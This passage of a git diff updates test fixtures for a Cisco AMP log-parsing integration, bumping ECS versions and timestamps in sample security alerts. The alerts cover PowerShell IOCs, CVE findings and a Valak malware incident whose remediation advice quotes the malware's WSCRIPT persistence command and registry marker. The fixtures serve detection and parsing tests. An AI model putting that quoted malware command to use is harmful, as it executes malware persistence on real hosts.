Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7\"}}}}}", "kind": "alert", "start": "2020-12-25T05:30:41.000Z", @@ -3463,7 +3463,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -3483,7 +3483,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:35.701416142Z", + "ingested": "2021-09-13T18:06:29.783809722Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1519340132474871000,\"timestamp\":1608874241,\"timestamp_nanoseconds\":474861000,\"date\":\"2020-12-25T05:30:41+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1608874241,\"start_date\":\"2020-12-25T05:30:41+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Microsoft Word launched PowerShell. 
This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.\",\"short_description\":\"W32.WinWord.Powershell\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7\"}}}}}", "kind": "alert", "start": "2020-12-25T05:30:41.000Z", @@ -3548,7 +3548,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -3568,7 +3568,7 @@ }, "event": { "severity": 1, - "ingested": "2021-09-12T17:32:35.701418Z", + "ingested": "2021-09-13T18:06:29.783811789Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15193384389977,\"timestamp\":1608872547,\"timestamp_nanoseconds\":0,\"date\":\"2020-12-25T05:02:27+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1608872547,\"start_date\":\"2020-12-25T05:02:27+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"mshtml.dll\",\"identity\":{\"sha256\":\"d1bea74ac9d85b3dcd4abc1af42af6c37b9349defc8e6577993611b773f56ca0\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft Internet Explorer\",\"version\":\"11\",\"cve\":\"CVE-2018-0762\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762\"},{\"cve\":\"CVE-2018-0772\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772\"}]}}", "kind": "alert", "start": "2020-12-25T05:02:27.000Z", 
@@ -3647,7 +3647,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -3667,7 +3667,7 @@ }, "event": { "severity": 1, - "ingested": "2021-09-12T17:32:35.701419883Z", + "ingested": "2021-09-13T18:06:29.783813851Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15193384371995,\"timestamp\":1608872546,\"timestamp_nanoseconds\":0,\"date\":\"2020-12-25T05:02:26+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1608872546,\"start_date\":\"2020-12-25T05:02:26+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"mshtml.dll\",\"identity\":{\"sha256\":\"1dc5d15a26a79bb46519952a60b15aa4acb36f6ce3247ebf50df9c157bc4fcf4\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft Internet Explorer\",\"version\":\"11\",\"cve\":\"CVE-2018-0762\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762\"},{\"cve\":\"CVE-2018-0772\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772\"}]}}", "kind": "alert", "start": "2020-12-25T05:02:26.000Z", 
@@ -3746,7 +3746,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -3766,7 +3766,7 @@ }, "event": { "severity": 1, - "ingested": "2021-09-12T17:32:35.701421764Z", + "ingested": "2021-09-13T18:06:29.783815980Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15193366641599,\"timestamp\":1608870773,\"timestamp_nanoseconds\":0,\"date\":\"2020-12-25T04:32:53+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1608870773,\"start_date\":\"2020-12-25T04:32:53+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"OUTLOOK.EXE\",\"identity\":{\"sha256\":\"465f398ae8e3c32395eb7c04bc8cd24595068e6a127e243bed3e9b4931556bfc\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"71854d2c40664493e05c0a7e4f0c7cc74ada1a63eec1d4fe32350f6af8728243\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft 
Office\",\"version\":\"2016\",\"cve\":\"CVE-2017-0106\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0106\"},{\"cve\":\"CVE-2017-11774\",\"score\":\"6.8\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11774\"},{\"cve\":\"CVE-2017-8506\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8506\"},{\"cve\":\"CVE-2017-8507\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8507\"},{\"cve\":\"CVE-2017-8571\",\"score\":\"6.8\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8571\"},{\"cve\":\"CVE-2017-8663\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8663\"},{\"cve\":\"CVE-2018-0791\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0791\"}]}}", "kind": "alert", "start": "2020-12-25T04:32:53.000Z", @@ -3864,7 +3864,7 @@ { "@timestamp": "2020-12-25T04:22:45.000Z", "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -3882,7 +3882,7 @@ "event": { "severity": 0, "action": "Policy Update", - "ingested": "2021-09-12T17:32:35.701423630Z", + "ingested": "2021-09-13T18:06:29.783818038Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525498672153625000,\"timestamp\":1608870165,\"timestamp_nanoseconds\":878000000,\"date\":\"2020-12-25T04:22:45+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "id": "6525498672153625000", "kind": "alert" @@ -3919,7 +3919,7 @@ { "@timestamp": "2020-12-25T04:07:21.000Z", "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -3937,7 +3937,7 @@ "event": { "severity": 0, "action": "Scan Completed, No Detections", - "ingested": "2021-09-12T17:32:35.701425510Z", + "ingested": "2021-09-13T18:06:29.783820119Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525494703603843000,\"timestamp\":1608869241,\"timestamp_nanoseconds\":928000000,\"date\":\"2020-12-25T04:07:21+00:00\",\"event_type\":\"Scan Completed, No Detections\",\"event_type_id\":554696715,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"scan\":{\"description\":\"Flash Scan\",\"clean\":true,\"scanned_files\":2872,\"scanned_processes\":49,\"scanned_paths\":0,\"malicious_detections\":0}}}", "id": "6525494703603843000", "kind": "alert" @@ -3982,7 +3982,7 @@ { "@timestamp": "2020-12-25T04:06:40.000Z", "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -4000,7 +4000,7 @@ "event": { "severity": 0, "action": "Scan Started", - "ingested": "2021-09-12T17:32:35.701427375Z", + "ingested": "2021-09-13T18:06:29.783822173Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525494527510184000,\"timestamp\":1608869200,\"timestamp_nanoseconds\":537000000,\"date\":\"2020-12-25T04:06:40+00:00\",\"event_type\":\"Scan Started\",\"event_type_id\":554696714,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"scan\":{\"description\":\"Flash Scan\"}}}", "id": "6525494527510184000", "kind": "alert" diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp2.ndjson.log b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp2.log similarity index 100% rename from packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp2.ndjson.log rename to packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp2.log 
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp2.ndjson.log-expected.json b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp2.log-expected.json similarity index 98% rename from packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp2.ndjson.log-expected.json rename to packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp2.log-expected.json index a4bddd0ecca..76d410f5e5b 100644 --- a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp2.ndjson.log-expected.json +++ b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp2.log-expected.json @@ -3,7 +3,7 @@ { "@timestamp": "2021-01-15T11:59:52.000Z", "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -21,7 +21,7 @@ "event": { "severity": 4, "action": "SecureX Threat Hunting Incident", - "ingested": "2021-09-12T17:31:04.469612451Z", + "ingested": "2021-09-13T18:06:41.546081683Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"timestamp\":1610711992,\"timestamp_nanoseconds\":155518026,\"date\":\"2021-01-15T11:59:52+00:00\",\"event_type\":\"SecureX Threat Hunting Incident\",\"event_type_id\":1107296344,\"connector_guid\":\"test_connector_guid\",\"severity\":\"Critical\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Threat_Hunting\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"87:c2:d9:a2:8c:74\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"threat_hunting\":{\"incident_report_guid\":\"6e5292d5-248c-49dc-839d-201bcba64562\",\"incident_hunt_guid\":\"4bdbaf20-020f-4bb5-9da9-585da0e07817\",\"incident_title\":\"Valak Variant\",\"incident_summary\":\"The host Demo_Threat_Hunting is compromised by a Valak malware variant. Valak is a multi-stage malware attack that uses screen capture, reconnaissance, geolocation, and fileless execution techniques to infiltrate and exfiltrate sensitive information. 
Based on the event details listed and the techniques used, we recommend the host in question be investigated further.\",\"incident_remediation\":\"We recommend the following:\\r\\n\\r\\n- Isolation of the affected hosts from the network\\r\\n- Perform forensic investigation\\r\\n - Review all activity performed by the user\\r\\n - Upload any suspicious files to ThreatGrid for analysis\\r\\n - Search the registry for data \\\"var config = ( COMMAND_C2\\\" and remove the key\\r\\n - Review scheduled tasks and cancel any involving the execution of WSCRIPT.EXE //E:jscript C:\\\\Users\\\\Public\\\\PowerManagerSpm.jar:LocalZone lqjsxokgowhbxjaetyrifnbigtcxmuj eimljujnv\\r\\n - Remove the Alternate Data Stream file located C:\\\\Users\\\\Public\\\\PowerManagerSpm.jar:LocalZone.\\r\\n- If possible, reimage the affected system to prevent potential unknown persistence methods.\",\"incident_id\":416,\"tactics\":[{\"name\":\"Defense Evasion\",\"description\":\"\u003cp\u003eThe adversary is trying to avoid being detected.\u003c/p\u003e\\n\\n\u003cp\u003eDefense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. 
Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.\u003c/p\u003e\\n\",\"external_id\":\"TA0005\",\"mitre_name\":\"tactic\",\"mitre_url\":\"https://attack.mitre.org/tactics/TA0005\"}],\"techniques\":[{\"name\":\"Data from Local System\",\"description\":\"\u003cp\u003eAdversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may do this using a \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e, such as \u003ca href=\\\"https://attack.mitre.org/software/S0106\\\"\u003ecmd\u003c/a\u003e, which has functionality to interact with the file system to gather information. Some adversaries may also use \u003ca href=\\\"https://attack.mitre.org/techniques/T1119\\\"\u003eAutomated Collection\u003c/a\u003e on the local system.\u003c/p\u003e\\n\",\"external_id\":\"T1005\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1005\",\"tactics_names\":\"Collection\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":\"Privileges to access certain files and directories\",\"permissions\":\"\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters\"},{\"name\":\"Scheduled Task/Job\",\"description\":\"\u003cp\u003eAdversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). 
Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).\u003c/p\u003e\\n\",\"external_id\":\"T1053\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1053\",\"tactics_names\":\"Execution, Persistence, Privilege Escalation\",\"platforms\":\"Windows, Linux, macOS\",\"system_requirements\":null,\"permissions\":\"Administrator, SYSTEM, User\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters, Windows event logs\"},{\"name\":\"Scripting\",\"description\":\"\u003cp\u003e\u003cstrong\u003eThis technique has been deprecated. Please use \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e where appropriate.\u003c/strong\u003e\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. 
Common scripting languages for Windows include VBScript and \u003ca href=\\\"https://attack.mitre.org/techniques/T1086\\\"\u003ePowerShell\u003c/a\u003e but could also be in the form of command-line batch scripts.\u003c/p\u003e\\n\\n\u003cp\u003eScripts can be embedded inside Office documents as macros that can be set to execute when files used in \u003ca href=\\\"https://attack.mitre.org/techniques/T1193\\\"\u003eSpearphishing Attachment\u003c/a\u003e and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through \u003ca href=\\\"https://attack.mitre.org/techniques/T1203\\\"\u003eExploitation for Client Execution\u003c/a\u003e, where adversaries will rely on macros being allowed or that the user will accept to activate them.\u003c/p\u003e\\n\\n\u003cp\u003eMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. 
(Citation: Alperovitch 2014)\u003c/p\u003e\\n\",\"external_id\":\"T1064\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1064\",\"tactics_names\":\"Defense Evasion, Execution\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":null,\"permissions\":\"User\",\"data_sources\":\"Process monitoring, File monitoring, Process command-line parameters\"}],\"severity\":\"critical\",\"incident_start_time\":1610707688,\"incident_end_time\":1592478770},\"tactics\":[{\"name\":\"Defense Evasion\",\"description\":\"\u003cp\u003eThe adversary is trying to avoid being detected.\u003c/p\u003e\\n\\n\u003cp\u003eDefense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.\u003c/p\u003e\\n\",\"external_id\":\"TA0005\",\"mitre_name\":\"tactic\",\"mitre_url\":\"https://attack.mitre.org/tactics/TA0005\"}],\"techniques\":[{\"name\":\"Data from Local System\",\"description\":\"\u003cp\u003eAdversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may do this using a \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e, such as \u003ca href=\\\"https://attack.mitre.org/software/S0106\\\"\u003ecmd\u003c/a\u003e, which has functionality to interact with the file system to gather information. 
Some adversaries may also use \u003ca href=\\\"https://attack.mitre.org/techniques/T1119\\\"\u003eAutomated Collection\u003c/a\u003e on the local system.\u003c/p\u003e\\n\",\"external_id\":\"T1005\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1005\",\"tactics_names\":\"Collection\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":\"Privileges to access certain files and directories\",\"permissions\":\"\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters\"},{\"name\":\"Scheduled Task/Job\",\"description\":\"\u003cp\u003eAdversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. 
These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).\u003c/p\u003e\\n\",\"external_id\":\"T1053\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1053\",\"tactics_names\":\"Execution, Persistence, Privilege Escalation\",\"platforms\":\"Windows, Linux, macOS\",\"system_requirements\":null,\"permissions\":\"Administrator, SYSTEM, User\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters, Windows event logs\"},{\"name\":\"Scripting\",\"description\":\"\u003cp\u003e\u003cstrong\u003eThis technique has been deprecated. Please use \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e where appropriate.\u003c/strong\u003e\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and \u003ca href=\\\"https://attack.mitre.org/techniques/T1086\\\"\u003ePowerShell\u003c/a\u003e but could also be in the form of command-line batch scripts.\u003c/p\u003e\\n\\n\u003cp\u003eScripts can be embedded inside Office documents as macros that can be set to execute when files used in \u003ca href=\\\"https://attack.mitre.org/techniques/T1193\\\"\u003eSpearphishing Attachment\u003c/a\u003e and other types of spearphishing are opened. 
Malicious embedded macros are an alternative means of execution than software exploitation through \u003ca href=\\\"https://attack.mitre.org/techniques/T1203\\\"\u003eExploitation for Client Execution\u003c/a\u003e, where adversaries will rely on macros being allowed or that the user will accept to activate them.\u003c/p\u003e\\n\\n\u003cp\u003eMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)\u003c/p\u003e\\n\",\"external_id\":\"T1064\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1064\",\"tactics_names\":\"Defense Evasion, Execution\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":null,\"permissions\":\"User\",\"data_sources\":\"Process monitoring, File monitoring, Process command-line parameters\"}]}}", "kind": "alert" }, @@ -173,7 +173,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -205,7 +205,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469616802Z", + "ingested": "2021-09-13T18:06:41.546087563Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180352115244794000,\"timestamp\":1610709638,\"timestamp_nanoseconds\":279000000,\"date\":\"2021-01-15T11:20:38+00:00\",\"event_type\":\"Threat 